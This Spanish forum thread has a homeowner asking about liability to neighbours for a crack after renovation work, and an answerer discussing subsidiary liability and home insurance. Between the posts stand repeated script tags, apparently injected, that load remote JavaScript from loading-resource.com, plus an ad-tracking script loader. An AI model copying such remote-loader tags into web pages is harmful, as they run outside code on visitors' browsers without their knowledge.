Duda después de resolución pericial.

Hola.

hace cosa de 3 meses realice obras en casa,tire un par de tabica y moví otra,todo con licencias de obras presentando documentación en el ayuntamiento ...etc

me incline por un gremio por la rapidez,,aparte de asesoramiento y que ya conocía que disponen de seguro.

la mes de terminar la obra aparecieron mis vecino diciendo que había aparecido una grieta y desperfectos en la escayola de su habitación,lo de la escayola quedo claro en cuanto me lo enseño de que no tenían ningún tipo de justificación para su queja pero le comente que me pondría en contacto con el gremio que realizo la obra para que viniesen a ver la grieta.

cuando vino el encargado del gremio,mis vecinos no le querían recibir,salieron a relucir trapos sucios de una obra pasada de la cual yo no tenia conocimiento,debieron de quedar mal anteriormente y aunque el encargado en principio dijo de hacerse cargo de la reparación ellos se negaron, bueno,su hijo porque ellos no se dignaron a aparecer,escondidos en el salón.. Y pidieron que viniese un perito.

el encargado del gremio se puso en contacto con su seguro y vinieron a peritar.

ahora me ha llegado una carta de una abogada del seguro de mis vecinos pidiéndome los datos del gremio y yo me he puesto en contacto con el gremio estos me han comentado que la resolución del perito de su seguro dice que no es por la obra que realice.

me han pedido una copia de la carta para enviársela a su seguro y que estos se la remitan al de mis vecinos.

pueden mis vecinos pedirme algún tipo de responsabilidad? Yo he actuado como me corresponde dando parte y ahora debería de hacerse cargo entre los seguros no?

Me parece raro que el seguro de mi vecino,me pida los datos del gremio cuando el perito del seguro de estos ya ha pasado.

gracias

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>

1 Respuesta

Respuesta
1

Creo que sí pueden pedirle a Ud. responsabilidad, pero supongo que sería una responsabilidad subsidiaria.

Mire su seguro de hogar. Los seguros de hogar suelen cubrir la responsabilidad subsidiaria por obras menores en la vivienda, y si está cubierta, también lo estará la defensa jurídica.

Las cartas y la información de unos y otros supongo es para poder reclamarse o rehusarse directamente entre ellos, sea amistosamente o judicialmente.

Es caso es que si quieres reclamar a alguien, necesitas sus datos, y además, una reclamación judicial requiere un reclamación previa amistosa.

Es posible que sus vecinos tengan los datos del perito, y no del seguro.

En estos casos, dado que tienen que resolverlo entre ellos, yo no tendría reparo en dar ningún dato de los intervinientes, y si quiere evitar dar algún dato, pues omita el de Ud., pero aquí, lo importante es que ellos lleguen a un acuerdo y que a Ud. no le afecte.

Si no llegan a ningún acuerdo entre peritos y aseguradoras y se interponen demandas, es casi seguro que Ud. estará en ellas, por ser el propietario de la vivienda donde se ha originado el daño.

De ahí la importancia de tener un seguro de hogar decente y que le cubra la posible responsabilidad como contratante de obras menores.

Es mi opinión..

Caso de duda, plantee de nuevo la cuestión a otro experto.

Suerte.

Cris.

GRACIAS

Si hubiese algún cambio se lo comentaría.

muchas gracias

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script id="__changoScript" type="text/javascript">// <![CDATA[var __chd__ = {'aid':11079,'chaid':'www_objectify_ca'};(function() { var c = document.createElement('script'); c.type = 'text/javascript'; c.async = true;c.src = ( 'https:' == document.location.protocol ? 'https://z': 'http://p') + '.chango.com/static/c.js'; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c, s);})();// ]]></script><script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=__magnetic.init"></script>

Añade tu respuesta

Haz clic para o

Más respuestas relacionadas